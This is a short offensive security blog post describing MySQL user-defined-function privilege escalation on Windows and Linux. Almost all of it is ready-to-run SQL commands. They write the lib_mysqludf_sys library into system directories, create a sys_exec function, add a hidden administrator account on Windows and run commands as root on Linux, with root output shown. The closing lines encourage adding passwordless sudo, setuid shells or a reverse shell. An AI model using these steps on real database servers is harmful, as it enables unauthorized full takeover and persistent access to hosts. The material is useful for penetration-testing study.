# MySql User-Defined Function (UDF) Privilege Escalation (Windows & Linux)

By [int0x33](https://paragraph.com/@int0x33) · 2021-11-17

---

We will get into making our own functions in later posts but for now, the UDF compiled shared objects from SQLMap are great.

[https://github.com/int0x33/sqlmap/tree/master/udf/mysql](https://github.com/int0x33/sqlmap/tree/master/udf/mysql)

### Windows Escalation

    mysql> USE mysql;
    mysql> CREATE TABLE pwn(line blob);
    mysql> INSERT INTO pwn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
    mysql> SELECT * FROM mysql.pwn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
    mysql> CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
    mysql> SELECT sys_exec("net user pwned pwn123! /add");
    mysql> SELECT sys_exec("net localgroup Administrators pwned /add");
    

### Linux Escalation

    mysql> use mysql;
    mysql> create table pwn(line blob);
    mysql> insert into pwn values(load_file('/home/npn/lib_mysqludf_sys.so'));
    mysql> select * from pwn into dumpfile '/usr/lib/lib_mysqludf_sys.so';
    mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
    mysql> select sys_exec('id > /tmp/out; chown npn.npn /tmp/out');
    

### Verify Command Execution

    user@box:/$ cat /tmp/out uid=0(root) gid=0(root) groups=0(root)
    

You can now execute code as root, what more do you need? You can allow SUDO all no password or create SETUID shell program with c, execute a reverse shell, etc, whatever you want. Be creative.

---

*Originally published on [int0x33](https://paragraph.com/@int0x33/mysql-user-defined-function-udf-privilege-escalation-windows-linux)*